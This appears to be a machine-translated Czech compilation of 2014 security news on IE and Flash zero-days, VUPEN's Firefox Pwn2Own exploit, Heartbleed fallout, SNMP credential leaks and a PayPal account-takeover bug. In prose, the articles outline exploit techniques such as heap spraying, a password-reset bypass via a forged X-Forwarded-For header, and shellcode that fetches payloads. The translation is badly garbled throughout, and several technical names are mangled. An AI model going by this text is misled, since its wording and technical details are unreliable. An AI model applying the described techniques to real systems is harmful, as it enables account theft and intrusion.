Starší verze prohlížeče Internetu Exploreru má neopravenou softwarovou chybu, která by mohla útočníkům umožnit přístup do počítače pomocí zákeřného kódu. Je to druhá chyba tohoto typu, jež byla nalezena v období jednoho měsíce.

Microsoft byl podle Iniciativy Zero Day (ZDI), kterou provozuje společnost HP, na chybu upozorněn v říjnu, kdy ji objevil belgický výzkumník Peter Van Eeckhoutte.

Iniciativa veřejně sdílí informace o bezpečnostních chybách po šesti měsících, aby měli dodavatelé softwaru čas na jejich opravu. ZDI Microsoft na své plány o zveřejnění detailů této chyby naposledy upozornila 8. května.

Prohlížeč IE 8, který pod taktovkou Microsoftu vyšel před pěti lety, má podle dubnových statistik stále 20% podíl na trhu s desktopovými prohlížeči.

Aby útočník mohl chyby využít, musel by potenciální oběť nalákat na speciálně navrženou webovou stránku, čehož by mohlo být dosaženo e-mailem nebo soukromou zprávou s odkazem, po jehož otevření by se útok spustil. Pokud by byl útok spuštěn úspěšně, útočník by získal stejná uživatelská práva k napadenému počítači jako jeho oběť.

Začátkem tohoto měsíce Microsoft vydal pohotovostní záplatu pro chybu pro prohlížeče IE 6 až 11, opravený problém mohl útočníkům umožnit vzdálené spuštění kódu na nakažených počítačích, opět pouze v případě, že uživatelé navštívili pomocí IE speciální webové stránky.


Nový, neopravených IE 0 Den zveřejněny na ZDI
21.5.2014
Zranitelnosti

Zero Day Initiative již zveřejnila novou a unpatched IE 0-Day , která byla původně ohlášené k nim (a potažmo i Microsoft) v říjnu 2013. V podstatě, oběť musí jít na řemeslně webové stránky, který využívá manipulace s CMarkup předměty, které v konečném důsledku mohou být použity ke spuštění kódu s oprávněními procesu webovém prohlížeči. Microsoft říká, že EMET zmírní tuto chybu a nejméně Tipping Point tvrdí ochrany s jejich zařízením. V tomto okamžiku, není tam žádný náznak toho, že je používán v přírodě. Zajímavostí zde je časová osa mezi počátečním zprávy a tam být žádný náplast.

Tento deník bude aktualizován, jakmile to situace vyžaduje.


VUPEN zveřejňuje podrobnosti o záplatované Firefox Pwn2Own Zero-Day
21.5.2014
Zranitelnosti

Soutěžící v letošní soutěži Pwn2Own bez okolků o tom: oni šli po prohlížečích, a jak se ukázalo, Firefox měl největší cíl na jeho zádech.

Populární prohlížeč Mozilla se objevila čtyřikrát během kanadské hacker festivalu účetnictví pro čtvrtinu 800000 dolarů-plus na odměny rozdalo v průběhu dvou dnů.

Kontroverzní zranitelnost a využívat dodavatele VUPEN vyhrál šest Pwn2Own peněžní odměny, včetně zero-day ve Firefoxu, informace , z nichž je sdílené včera. Zakladatel Chaouki Bekrar řekl Threatpost března, že výzkumníci VUPEN běžel více než 60 milionů testovacích případů prostřednictvím fuzzer před tím, než byli schopni najít poškození paměti problém vedoucí k využitelnou použití-po-stavu bez ve Firefoxu.

"Tato chyba nebylo snadné najít a využít, protože to vyžaduje prohlížeč, aby se v určitém paměťovém stavu dosáhnout zranitelné kód pobočku, tento stav se nazývá Mozilla:" Paměť-tlak, "řekl VUPEN v prohlášení včera.

Mozilla oprava čtyři Firefox zero-day zranitelnosti v rámci jednoho týdne od jejich zveřejnění na dodavatele během Pwn2Own. VUPEN nula den byl nalezen ve Firefoxu 27 běží na plně záplatované Windows 8.1 v počítači.

VUPEN nula den byl nalezen ve Firefoxu 27 běží na plně záplatované Windows 8.1 v počítači.
VUPEN je kód zneužití spuštění podmínku použití-po-free nejprve napadá funkci Spray, aby bylo možné konzumovat paměťových zdrojů, které spustí funkci tlaku, spotřebují další prostředky.

"Jako "Tlak ()" funkce je rekurzivní, "sprej ()" funkce bude volána mnohokrát. Každá operace haldy sprej provádí tuto funkci je uložen v kartě pole, "řekl výzkumníci VUPEN. "Po několika sekundách, Firefox se spustí z paměti a vstupuje do určitého stavu, s názvem "tlak paměti" nebo "nedostatek paměti" , které se automaticky aktivuje na ochranu prohlížeče z intenzivního využití paměti. "

Po aktivaci VUPEN řekl, že je schopen odstranit uvolněné "BumpChunk" objekt, který nakonec vede k využitelnou havárii prohlížeče.

"Aby bylo možné tuto chybu zabezpečení zneužít útočník potřebuje nejprve převzít kontrolu uvolněného objektu," řekl VUPEN. "Chcete-li nahradit obsah uvolněného objektu se útočník řízené daty, musí být vytvořeno více prvků, které mají stejnou velikost jako zranitelné objektu. Toho lze dosáhnout tím, postřikem ArrayBuffers z 0 × 2000 bajtů. "

Odtamtud, oni byli schopní způsobit nevracení paměti a přetečení vyrovnávací paměti v registru EIP, a nakonec obejít Adresa Space Layout randomizace a spuštění dat paměti zaručuje ochranu nativní Windows, aby bylo možné spustit kód na základní systém.

Podrobnosti o zbývajících Firefox nulové dnů přinesli na Pwn2Own mají zatím být propuštěn. Pozoruhodný iPhone a PlayStation útěk z vězení hacker George "geohotovu" Hotz skóroval 50,000 dolarů za jeho hack Firefox, ve kterém on také našel problém paměti způsobuje exploitovatelnou pád a spuštění kódu.

Výzkumník Juri Aedla, časté Google bug-hunter, také našel zero-day spuštění kódu chybu v prohlížeči. Mozilla uvedl ve svém poradenství v té době, že: "TypedArrayObject nezpracovává případ, kdy jsou ArrayBuffer objekty kastrovaný, nastavení jejich délky na nulu, zatímco ještě v použití. To vede k out-of-hranice čte a zapisuje do haldy JavaScript, který umožňuje spuštění nežádoucího kódu. "

Polský badatel Mariusz Mlynski byl čtvrtý Pwn2Own soutěžící svrhnout Firefox. Spojil dvě chyby zabezpečení získat oprávnění eskalaci.

"Kombinace těchto dvou chyb umožňují útočníkovi načtení URL, JavaScript, který je proveden s plnými právy prohlížeče, která umožňuje spuštění libovolného kódu," řekl Mozilla ve svém poradenství .


Kritická infrastruktura společnosti i nadále Patch Heartbleed
19.5.2014
Zranitelnosti
Unified Automation vydal poradní bezpečnostní varování, že jeho OPC UA vývojáři softwaru kit (SDK) pro systém Windows obsahuje OpenSSL kryptografie knihovnu, která je citlivá na Heartbleed. Schneider Electric, jiný řídící systém průmyslové (ICS) výrobce, zaslali své vlastní zpravodaje s informacemi zmírňování pro stejné chyby, které mohou být zavedené komponenty třetí strany, ve svém Wonderware Intelligence zabezpečení aplikace.

Heartbleed byla zveřejněna 7. dubna; zranitelnost je chybějící hranice zkontrolovat v rozšíření OpenSSL TLS Heartbeat, který vystavuje 64 kB paměti se každé odpovědi. Přehrávání útok může v konečném důsledku úniku pověření, a někteří vědci se podařilo chytit soukromé šifrovací klíče.

Unified automatizace není ve skutečnosti upevnění nic zde. Ve skutečnosti, výrobce průmyslových řídících a SCADA systémů je pouze poznamenat, že jeho Windows OPC UA SDK - za určitých okolností - může být náchylné na chyby. Ve výchozím nastavení, přesnou C + + a ANSI-založené vývojáři soupravy nemají HTTPS implementována.

Nicméně, tyto sestavy nemají obsahovat zranitelnou OpenSSL šifrovací knihovny, pokud je povolen protokol HTTPS. Pro uživatele nasazení HTTPS, Česká Automatizace doporučuje se nahradit zranitelnou OpenSSL knihovnu s aktuální verzí (1.01.g nebo novější), s cílem zmírnit tento problém.

Schneider Electric na druhé straně pracoval s třetí stranou na loď opravu zranitelnosti Heartbleed do svých systémů Wonderware Intelligence. Zatímco většina aktuální verze těchto systémů není zranitelný a již byla stanovena, firma vysvětluje poradní, že počet uživatelů - po použití poslední aktualizace - nová instalace komponent třetích stran známé jako Vlies Server. Že složka je citlivá na OpenSSL je Heartbleed chyby.

Proto, Schneider Electric a tvůrci Vlies Server společně pracovali na zmírnění chybu ve svých složek. Provozovatelé běží Tablo Server verze 8.0.6 až 8.0.9 a 8.1.0 až 8.1.5 bude muset implementovat tyto opravy s cílem vyřešit potenciálně závažnou chybu.

Digi a Siemens zavedly podobných záplaty k nápravě Heartbleed ve svém ICS zařízení v posledních týdnech.


PayPal Opravy Serious účet únos Chyba ve Správci
19.5.2014
Zranitelnosti
PayPal oprava díru ve svém Portal Manager tento týden, že by dělali to snadno útočník ukrást účet admina, změňte své heslo a krást jejich osobní informace - nemluvě o jejich úspory.

Manager je rysem služba, která umožňuje uživatelům spravovat svůj účet Payflow, název firmy pro brány, které obchodníci využít při přijímání plateb od zákazníků.

Mark Litchfield, IT konzultant, který objevil hack zaslali podrobné vysvětlení o tom (. PDF) na jeho pera testovací stránky, Securatary, pozdě ve středu.

"PayPal šel do značných délek (víc než ostatní), aby byla zajištěna bezpečnost tohoto portálu," napsal Litchfield.

Ne dost daleko zdánlivě.

Litchfield tvrdí, že začal tím, že zachytí žádost s web app bezpečnostního testeru Burp Suite a byl schopný používat jeho vestavěný uživatelským jménem slovníku se podívat na přihlášení. Poté, co dospěl k závěru, výčet, proces, který načte seznam legitimních obchodních přihlášení, Litchfield byl schopný sbírat více než polovina pryč informace, které potřeboval vyplnit Manažer přihlašovací obrazovce PayPal.

paypal2

Mít zabezpečil název partnera a obchodní protokol-in, Litchfield nepotřeboval e-mailovou adresu, on prostě potřeboval heslo, něco, co by mohl resetovat, aniž byste museli odpovědět na bezpečnostní otázku.

Aby bylo možné resetovat heslo zachytil požadavek POST a chytá se krkat je Repeater , nástroj tester používá pro manipulaci a reissuing HTTP požadavky. Odtud Litchfield byl schopen jít přes "Zapomenuté heslo" funkce a převodu vlastnictví tokenu z Repeater obejít hesla otázku.

Po zkopírování hodnoty cookie z krkat, Litchfield ji vzal, ji zapojil do žádosti a odstranit pole hlavičky HTTP referer, aby bylo možné změnit heslo uživatele.

Zatímco trik pracoval, když Litchfield přihlášen ze stejné IP adresy, když přihlášen z jiné IP adresy, PayPal by ji chytit a požádat o další ověřování.

Trvalo to několik pokusů, dvě krabičky marlborek a 17 kávy, ale Litchfield, který přirovnal svůj problém starých "nevidí les ze stromů" idiomu, na to přišel.

"Já byl zaměřený na zjištění app logický nedostatek obejít otázku namísto skutečného problému: Moje IP adresa," Litchfield uvedl v e-mailu na Threatpost čtvrtek. "Někdy musíte udělat velký krok zpět a podívat se na skutečný problém."

Jeho řešení: Použití jiné pole hlavičky HTTP, X-Předáno-Pro, který identifikuje původu IP adresu klienta s připojením na webový server přes HTTP proxy nebo Vyrovnávání zatížení.

Trvalo to několik pokusů, ale poté, co omezuje několik IP adres - jeho telefonu a IP adresa manager.paypal.com - Litchfield zjistil, že by mohl dostat jeho hack do práce míchání a odpovídající informace, on zadána.

"Poté, co víc blbnout, Rozhodl jsem se, že odpovídající správnou IP adresu, je omezena na rozsah třídy B Network - xxx.xxx.0.0," napsal ve své analýze Středa, "To přispívá k velmi jednoduché brute force útoku."

Jednou, Litchfield poukazuje na to, že útočník může snadno mít přístup k citlivým informacím na admina, spolu s citlivými informacemi svých zákazníků. Mohly by také použít virtuální terminál připsat peníze zpět na svůj vlastní účet nebo jít nakupovat s penězi oběti.

Po přibití problému IP adresu Litchfield upravit svůj poradní a poslal ho na PayPal, kde se tvrdí, společnost, problém byl vyřešen během několika hodin.

Litchfield očekává, že hack bude nárok na bug bounty programu PayPal, protože vystaven zabil osobní identifikační údaje, a jak sám říká "nám v podstatě umožňuje přístup k jejich" pokladny "."

Jak to stojí, že stále ještě nic neslyšel zpět od společnosti, pokud jde o odměnu nicméně. PayPal nereagoval na žádosti o komentář na čtvrtek.

Litchfield, jehož Securatary firma vykopal hrst chyb v eBay a Google již v tomto roce, je shodou okolností také bratr bezpečnostní expert databáze David Litchfield. David Litchfield je samozřejmě známý v bezpečnostních kruzích poprvé narazil na SQL červ Slammer cesta zpět v roce 2003, spolu s bezpočtem dalších faktorů zranitelnosti v Microsoft, Oracle a IBM v průběhu let.


Embedded Devices Leak Ověření dat přes SNMP Community String
19.5.2014
Zranitelnosti
Vědci objevili dosud nehlášené problémy v SNMP na embedded zařízeních , kde jsou zařízení, jako jsou sekundárním trhu domácích routerů a populární zatížení podnikové třídy pro vyrovnávání úniku informací autentizace ve formátu prostého textu.

Tyto údaje by mohly být získány prostřednictvím přístupu k veřejným SNMP community řetězec jen pro čtení, který umožňuje mimo přístup k informacím o zařízení. Zatímco pouze zranitelnosti ve třech značek byly dnes zveřejněny, Shodan hledání se objeví potenciálně stovky tisíc zařízení, která jsou vystavovat SNMP k Internetu, které by mohly být stejně zranitelní.

Brocade ServerIron ADX 1016-2-PREM, TrafficWork verze 12.5.00T403 zatížení aplikace vyvažovací ukládá uživatelská jména a hesla hash s SNMP MIB tabulkám, Rapid7 vedoucí bezpečnostní poradce Deral Heiland dodal, to je pravděpodobně nejzávažnější problémy dnes zveřejněných .

"To je používán řadou společností, které se tam na čelních různých aplikací na firemní sítě," řekl Heiland, s tím, že Shodan hledání zařízení se objevil 9000 s výhledem na internetu. "Je to mnohem nižší číslo, než domácí routery a modemy, ale to je 9000 podniků, které by mohly, v případě, že hesla jsou dost slabé, bude otevřena až do vzdálených útoků."

Heiland a kolega výzkumník Matthew Kienow také zveřejněny v podobných problémů v kabelových modemů Ambit U10C019 a Ubee DDW3611, stejně jako řadu DSL modemů Netopia 3347. Kabelové modemy úniku nejen uživatelská jména a hesla, ale také WEP klíče, SSID informace WPA PSK a. DSL modemy, zatím, také únik klíče WEP, WPA PSK a SSID.

Metasploit moduly pro všechny tři zranitelnosti byly dnes zveřejněny, který bude extrahovat data z každého zařízení.

"Tento typ dat je neočekávané, které mají být uloženy v MIB tabulkám pro SNMP. Je to atypické, "řekl Heiland, který poukázal na to, že oba modemy, které jsou použity na konci životnosti, ale jsou prodány na sekundárních trzích, jako je eBay. "Problém je v tom, že zranitelnost je také stávající hardware a současných přístrojů. Domnívám se, že 100 procent. "

Řekl Heiland, nicméně, že dodavatelé nejsou nastavení těchto zařízení s SNMP povolen a konfigurace Internet-čelí; její poskytovatelé služeb, kteří se obracejí na službu, pravděpodobně pro vzdálenou správu.

"Ale stejně, já nevím, proč je důležité mít předem sdílené klíče a hesla jsou k dispozici na tohle," řekl Heiland. "To je místo, kde chyba je. Je to implementace a nasazení problém. Při nastavení SNMP, nechcete opustit řetězce veřejné komunity v místě. "

Například, s Vyrovnávání zatížení Brocade, SNMP je ve výchozím nastavení povolena a komunitního řetězec "veřejné" je ve výchozím nastavení nakonfigurována, řekl Rapid7. To je otevřené dveře pro hacker ukrást hesla hashe, které mohou být popraskané režimu offline, pokud protokol je zakázán nebo veřejné komunita řetězec se změní.

Totéž platí pro NETOPIA DSL modemu, vyráběné společností Motorola; jak SNMP je povolen s veřejnou komunitní řetězce. Poskytovatelů DSL však, Heiland řekl, zapněte jej pro vzdálenou správu.

SNMP, zatím není ve výchozím nastavení povolena na kabelových modemů působnosti a Ubee; poskytovatelé kabelových pravděpodobně umožní ji na uplinku straně modemy, aby bylo možné řídit zařízení na dálku stejně.

Motorola Heiland řekl, přiznal zveřejnění Rapid7 k nim ale řekl, protože modemy jsou konce života, to není problém, ignoroval SHODAN data, která říká 229.409 Ambit přístroje jsou vystaveny na internetu, a 224.544 NETOPIA zařízení; 187.000 ve Spojených státech.

Heiland že podobné zranitelnosti v jiných zařízeních byly sděleny dodavatelů v otázce, a měly by být zveřejňovány relativně brzy.


Kyberzločinci našli první „posmrtnou“ zranitelnost Windows XP

18.5.2014 Zranitelnosti
Internet Explorer 6, 7 a 8 ještě nebyl napaden, ale kritická bezpečnostní slabina v nich očividně je.

Podle sobotního prohlášení Microsoftu dochází k pokusům o zneužití chyby, která existuje v Internet Exploreru od verze 6 výše. Jde o snahy přesměrovat uživatele prohlížeče na infikované weby, kde by se na jejich počítač nainstaloval malware.

Zranitelné jsou všechny podporované verze Internet Exploreru, včetně verze 6, která pochází dokonce z roku 2001. I tato archaická verze je podporována, ale pouze na operačním systému Windows Server 2003, kde pro ni i nadále budou uvolňovány bezpečnostní záplaty. Stejná chyba ve stejném prohlížeči tedy nebude opravena ve Windows XP, operačním systému, jehož podpora skončila 8. dubna 2014.

To je důvod, proč je právě ohlášená zranitelnost tak důležitá. Je první a je v podstatě na ní, aby si připravila ovlivněné uživatele na novou realitu. Microsoft již v loňském roce prohlásil, že Windows XP budou po ukončení záplatování o 66 procent pravděpodobněji infikovány. Uživatelé, kteří zůstávají na Windows XP, mají ovšem ještě několik možností, jak nebezpečí nákazy přinejmenším snížit.

Mohou například nainstalovat Enhanced Mitigation Experience Toolkit (EMET) 4.1 – bezpečnostní nástroj, který je zdarma dostupný na webu Microsoftu. Další možností je odregistrovat soubor VGA.dll. Jde o jednu z dynamických knihoven, která vykresluje VML (Vector Markup Language) ve Windows a Internet Exploreru. Podle bezpečnostní firmy FireEye byly dosavadní útoky cíleny pouze na IE 9, 10 a 11 a využívají funkcí zásuvného modulu Adobe Flash Player. Jeho dočasné vypnutí tak eliminuje nebezpečí hrozící ze současných útoků na Internet Explorer.

Pochopitelně dalším řešením je přejít na nějaký alternativní prohlížeč, jako je Google Chrome nebo Mozilla Firefox. Pro ty jejich vydavatelé budou uvolňovat bezpečnostní záplaty minimálně dalších dvanáct měsíců.

Společnost Microsoft sice opravu explicitně nepřislíbila ani pro podporované operační systémy, ale je prakticky jisté, že ji uvolní v nejbližší době. Nejbližší termín pro pravidelně uvolňované aktualizace je 13. května 2014. Microsoft v poslední době spíše ustupuje od mimořádně uspíšených aktualizací, tzv. záplat mimo cyklus. Možným důvodem je přílišné riziko vedlejších efektů a zavlečení chyb v nedostatečně testovaném kódu.

Podle prvních analýz je za útoky na zmiňovanou zranitelnost zkušené kyberzločinecká skupina, která v minulosti již testovala útoky na právě objevené chyby, které ještě neměly možnost opravy. I díky jejich zkušenostem je velmi obtížně monitorovat jejich aktivity, i proto, že nevyužívají opakovaně stejnou řídící infrastrukturu.


Microsoft zahrnul uživatele Windows XP do opravy pro IE

18.5.2014 Zranitelnosti
Navzdory ukončené podpoře operačního systému Windows XP obdrží jeho uživatelé aktualizaci obsahující opravu pro zranitelnost v prohlížeči Internet Explorer.
Mimořádná oprava se týká chyby, která útočníkům umožňuje získat přístup do uživatelských zařízení.

Microsoft ukončil podporu Windows XP před měsícem, čímž skončilo i vydávání opravných bezpečnostních aktualizací. V tomto případě se však společnost rozhodla učinit výjimku, protože zranitelnost byla objevena jen několik dnů po ukončení podpory.

„Přestože již Windows XP nejsou Microsoftem nadále podporovány a skončila doba, po kterou normálně poskytujeme bezpečnostní opravy, rozhodli jsme se vydat opravu pro všechny verze Windows XP,“ napsal Microsoft na oficiálním blogu. „Výjimku jsme učinili s ohledem na krátkou dobu, která uplynula od konce podpory.“

Na chybu byl Microsoft upozorněn počátkem tohoto týdne a nebylo jasné, jestli se opravné aktualizace dočkají i uživatelé zastaralého systému.

Zranitelnost se týká Internet Exploreru verzí 6 až 11 a podle Microsoftu dosud byla zneužita jen k malému množství útoků. Podle statistik společnosti NetMarket Share se chyba týká až 50 % všech internetových prohlížečů po celém světě.

Podle Microsoftu je možné chybu zneužít pomocí speciální webové stránky. Tu když uživatel navštíví, dá tak útočníkům přístup ke svému počítači a současně útočníci získají stejná uživatelská práva jako má on sám. Na druhou stranu musí být uživatel s obsahem na škodlivé webové stránce v přímé interakci.


Windows XP: Další propad v počtu uživatelů
18.5.2014
Zranitelnosti

Z nových statistik vyplývá, že i když řada uživatelů Windows XP po ukončení jejich podpory v dubnu opustila, tento třináct let starý operační systém je stále nainstalován ve více než jednom ze čtyř počítačů na světě.

Podle společnosti Net Applications se počet uživatelů XP v dubnu snížil o 1,6 % a tento OS tak nyní ovládá 26,1 % celkového trhu s desktopy a notebooky. Duben byl druhým měsícem v řadě, kdy analytici zaznamenali výraznější propad počtu uživatelů Windows XP.

Mezi všemi počítači s Windows měly „XPéčka“ minulý měsíc 28,8% zastoupení. Některý z operačních systémů od Microsoftu je nainstalován na jedenadevadesáti procentech všech počítačů na světě. Americká společnost vydala poslední bezpečnostní aktualizaci pro Windows XP osmého dubna a od té doby jsou uživatelé vydáni napospas kybernetickým zločincům, kteří na ně mohou útočit díky nově objeveným dírám. Bezpečnostní experti již dříve varovali před tím, že zločinci začnou brzy po ukončení podpory XP porovnávat chyby nalezené a zdokumentované v nových verzích s těmi v tomto operačním systému.

První příležitost pro útočníky se objevila minulý týden, když Microsoft potvrdil závažnou zranitelnost v Internet Exploreru. V tomto případě ještě udělala americká společnost výjimku a vydala opravu také pro IE8 pro Windows XP. S dalšími záplatami už by ale uživatelé počítat neměli. Útočníci totiž budou schopni díky vydaným opravným balíčkům porovnat opravený kód, najít zdroj díry a následně napsat malware pro XP, který ji zneužívá. A u Internet Exploreru to útočníci budou mít obzvláště lehké.

Díky nově zveřejněným datům je zřejmé, že Windows XP budou běžet na značném počtu počítačů ještě minimálně několik měsíců, či spíše let. Podle propočtů Computerworldu budou Windows XP na konci tohoto roku nainstalované na 19 % počítačů a v polovině roku příštího stále budou držet 14 % trhu. Vůbec nejvíc z úpadku Windows XP těží nejnovější verze OS od Microsoftu. Windows 8 a Windows 8.1 si v dubnu připsaly 0,9 % a jsou tak na 12,2 % všech počítačů na světě.

Podle odhadů Net Applications předeženou Windows 8.1 v počtu uživatelů Windows Vista ještě tento měsíc. Windows 7 z roku 2009 si polepšily v dubnu o 0,6 % a jsou nainstalovány na 49,4 % všech počítačů (54,4 % všech počítačů s Windows). Windows 7 si polepšily o půl procentního bodu méně, než v březnu, což značí, že velké společnosti pomalu ale jistě končí s přechodem na tento operační systém. Analytici očekávají, že počítače ve firmách na Windows 7 poběží ještě několik příštích let, jelikož podpora tohoto OS končí až v roce 2020.


Nový Flash Player 0-day (CVE-2014-0515), použitý v útoku zalévání otvory
28.4.2014
Zranitelnosti

V polovině dubna jsme zjištěny dvě nové exploity SWF. Po nějaké podrobnější analýze bylo jasné, že nevyužili některou z chyb zabezpečení, které jsme již věděli o. Poslali jsme využije pryč Adobe a o několik dní později dostal potvrzení, že se skutečně používat 0-denní zranitelnost, která byla později označen jako CVE-2014 - 0515 . Zranitelnost se nachází ve složce Pixel Bender, určená pro video a zpracování obrazu.

Dostali jsme vzorek první využívat na 14. dubna, přičemž vzorek druhý přišel na 16. dubna. První využití bylo původně zaznamenáno KSN 9. dubna, kdy bylo zjištěno, o obecné heuristické podpisu. Tam byly četné následné detekce 14. dubna a 16.. Jinými slovy, se nám podařilo detekovat dříve neznámé hrozby pomocí heuristiky.

Podle údajů KSN, tyto hrdinské činy byly uloženy jako movie.swf a include.swf na infikované stránky. Jediný rozdíl mezi těmito dvěma kusy škodlivého softwaru je jejich shellcodes. Je třeba poznamenat, že druhý využití (include.swf) nebyl detekován pomocí stejného heuristické podpis jako první, protože obsahuje unikátní shell kód.

Každý využít je jako nebalený Flash video souboru. Kód Action Script uvnitř se ani zatemnil ani šifrován.

Jak je obvyklé u tohoto druhu využití, první etapa je hromada sprej - příprava na dynamickou paměť pro využití zranitelnosti. Využije se rovněž navrženy tak, aby zkontrolovat verzi OS - jestliže je detekována Windows 8, je použit mírně modifikovaný byte-kódu komponenty Pixel Bender.

Fragment zranitelné Pixel Bender kódu (údaje v červeném rámečku se změní podle verze systému)

Fragment, jehož rozklad využívat kódu

Dále je aktuální využití zranitelnosti, a to úprava jednoho z indexů v tabulce metod / virtuální funkce.

Je zajímavé, jak využije dvě shellcodes. Prvním z nich je v obou aplikacích; to je poměrně krátké a připravuje paměti pro úspěšné fungování druhého shell kódu.

Fragment z prvního shell kód odladěný v WinDBG

Za prvé, stávající paměti je označen jako čtení, zápis a spouštění pomocí funkce API VirtualProject, a pak další paměť je alokována pomocí VirtualAlloc. Druhý shell kódu je zkopírována do této paměti a ovládání je převedena. Inicializace funkcí a převedení řízení na druhé shell kód API objeví v červených krabic na obrázku výše.

Druhá shellcodes využije se výrazně liší.

Využít, že jsme zjištěn první má standardní shell kód (movie.swf). Provádí hledání systémových knihoven v paměti, a pak se stáhne a spustí užitečné zatížení. Bohužel, spojení se ukázalo být neaktivní v době našeho výzkumu.

Fragment movie.swf využít druhý shellcode zodpovědný za stažení a spuštění užitečného zatížení

V druhé vykořisťovat - include.swf - druhý shell kód byl neobvyklý. Přijímá základny DLL adresu flash10p.ocx, hledání jej specifických fragmentů a interaguje s ciscompeaddin5x0 - Cisco MeetingPlace Express Add-In verze 5x0. Tento doplněk je používán účastníci web-konference pro prohlížení dokumentů a obrázků z obrazovky předvádějícího. Je třeba poznamenat, že využití nebude fungovat, pokud požadované verze programu Adobe Flash Player ActiveX a Cisco MPE nejsou k dispozici v systému.

Fragment include.swf využít druhý shell kód

Zdá se, že část informací pro využití include.swf je předáván z venku. Podle údajů KSN, referer na include.swf body do jiného souboru SWF: stream.swf. Ve stejné době, referer prvního využití - movie.swf - body index.php umístěné ve stejné složce jako zneužití (viz níže). Nemohli jsme zjistit přesné užitečné zatížení využívat include.swf vzhledem k nedostatku údajů zaslaných z odkazované stránky a / nebo programů typu exploit.

Jsme si jisti, že všechny tyto triky byly použity, aby bylo možné provádět škodlivé činnosti na velmi specifickou skupinu uživatelů, aniž by to vzbudilo pozornost bezpečnostních řešení. Domníváme se, že Cisco doplněk výše uvedené mohou být použity ke stažení / provedení užitečného zatížení, jakož i ke sledování přímo na infikovaném počítači.

Oba využije zjištěné u nás šíří z webu na adrese http://jpic.gov.sy/ . Tato stránka byla zahájena již v roce 2011 podle syrského ministerstva spravedlnosti a byl navržen jako on-line fóra pro občany, aby si stěžují na práva a pořádku porušování lidských práv. Jsme přesvědčeni, že útok byl navržen tak, aby cílové syrských disidentů stěžují na vládu.

Místo byl hacknutý v září 2013 něco údajný hacker oznámil na svém Twitteru účtu .

Odkaz na těchto činech je následující: http://jpic.gov.sy/css/images/_css/ ***********.

Když jsme vstoupili na stránky, nainstalované malware užitečné zatížení bylo již chybí ze složky "_css". Předpokládáme, že zločinci vytvořili složku, jejíž název nevypadá nemístně na zdroj správy, a kde naložili využije. Oběti byly pravděpodobně přesměrováni na exploity pomocí rámu nebo skript se nachází na místě. K dnešnímu dni, April 28, počet zjištěných podle našich výrobků překročil 30. Byly zjištěny na počítačích sedmi unikátních uživatelů, všichni v Sýrii, což není překvapující s ohledem na povahu těchto stránek. Zajímavé je, že všichni útočili uživatelé vstoupili do webové stránky pomocí různých verzí Mozilla Firefox.

Je pravděpodobné, že útok byl pečlivě naplánován a že odborníci docela vysoké ráže byly za ním. Použití profesionálně napsaných 0-day exploity, které byly použity k infikování jediný zdroj důkazem.

Navíc, zatímco první využití je poměrně standardní a mohou infikovat prakticky jakýkoliv nechráněný počítač, druhý exploit (include.swf) funguje pouze správně na počítačích, kde je nainstalován Adobe Flash Player 10 ActiveX a Cisco MeetingPlace Express Add-In. Komponenta Flash Player Pixel Bender, což Adobe již podporuje , byl použit jako útok vektoru. Autoři se spoléhám na vývojáře, že nemůže najít chybu zabezpečení v této složce a že využití zůstane aktivní po delší dobu. To vše naznačuje, že útočníci nebyli cílení uživatelům en masse.


Tor relé citlivé na Heartbleed klesla z anonymity sítě
28.4.2014
Zranitelnosti
Díky OpenSSL Heartbleed chyby , anonymita sítě Tor je sada dočasně ztratí kolem "12 procent kapacity výstupní a 12 procent strážní funkci." Odhad byl proveden Roger Dingledine, vedoucí projektu Tor, v příspěvek na Tor-relé e-mailové konference. Pokud se existence chyba byla poprvé zveřejněna, tým Tor poznamenal, že "by mohlo být třeba z Tor relé a mosty k úniku svých střednědobých cibule klíče nebo jejich dlouhodobou relé identitu klíče, "a ty, kteří pracují jim bylo doporučeno aktualizovat svůj balíček OpenSSL, zlikvidujte všechny soubory klíčů / v jejich DataDirectory a restartujte Tor generovat nové klíče. Některé z nich udělal, a jiní mají stále není, a druhý . jsou stále zamítnut v současné době "Přechod na nový klíč identity relé znamená, že relé je vidět, jak se úřady nové znovu: že ztratí svůj status Guard a měření šířky pásma," koordinátora Tor podpora a vývojáře Lunar poznamenal ve středu. "Zdá se, že řada provozovatelů na radu, jak síť ztratila kolem 1 Gbit / s na inzerované kapacity mezi 7.dubna a 10. v dubnu." "8. dubna, [člen komunity] grarpamp zjištěno, že více než 3000 relé bylo restartovat - doufejme, že používat pevnou verzi OpenSSL. Je známo, kolik z těchto relé se přepne do nového klíče od. [Tor vývojář] Andrea Shepard pracuje na průzkumu je identifikovat, "sdílel. "Co je známo, i když je relé, které jsou bohužel stále zranitelné. [Developer a správce Tor Cloud] Sina Rabbani zřídil viditelný seznam pro stráže a východy. Chcete-li chránit uživatele Tor, operátoři adresář úřadů začali odmítat deskriptory pro jednotlivé ohrožené relé. " Dingledine je připojeno k jeho poště seznam relé identity otisků prstů mu je odmítá na moria1 hlavní uzel, a říkal, že on a další by měla rozšířit seznam jako zjistí další relé, které přicházejí on-line s ohroženými verze OpenSSL.


Student zatčen za Heartbleed-využití porušení daňová kancelář
28.4.2014
Zranitelnosti
19-letý kanadský student byl zatčen za porušení systémy na Canada Revenue Agency (CRA) a odebírání sociální pojištění čísla některých 900 daňových poplatníků. To je věřil, že on byl schopný dělat tak tím, že využívá neslavný Heartbleed chybu. Královská kanadská jízdní policie "National Division Integrované technologické Crime Unit (ITCU) se snesl na Londýn, Ontario založená Stephen Arthuro Solis-Reyes 15. dubna, kdy byl zatčen bez incidentů ve svém domě a jeho počítačové vybavení bylo zabaveno. "Královská kanadská jízdní policie zachází toto porušení bezpečnosti jako vysoce prioritní případu a mobilizovat potřebné zdroje k vyřešení této záležitosti tak rychle, jak je to možné," řekl asistent komisaře Gilles Michaud v prohlášení . "Úspěch tohoto šetření odráží spolupráce úsilí RCMP a dalších vládních agentur, jakož i služby v Londýně policie." Canada Revenue Agency vzal své služby on-line režimu offline 8. dubna, poté, co byla informována o nebezpečí, že zranitelnost předložen k zabezpečení svých systémů, ale to bylo zřejmě ne dost rychle. V hodinách mezi veřejné odhalení existence chyby a služby takedown, Solis-Reyes údajně podařilo provést útok. Globe and Mail zprávy že Solis-Reyes je počítačová věda student na západní univerzity. Ten je naplánován k soudu v Ottawě 17. července 2014, a očekává se, že bude obviněn z jednoho počtu neoprávněného použití počítače a jednoho počtu Mischief ve vztahu k údajům. RCMP také řekl, že vyšetřování tohoto porušení je stále probíhá, takže by to mohlo ještě ukázat, že byli zapojeni další lidé. CRA není jen obětí útoku Heartbleed. 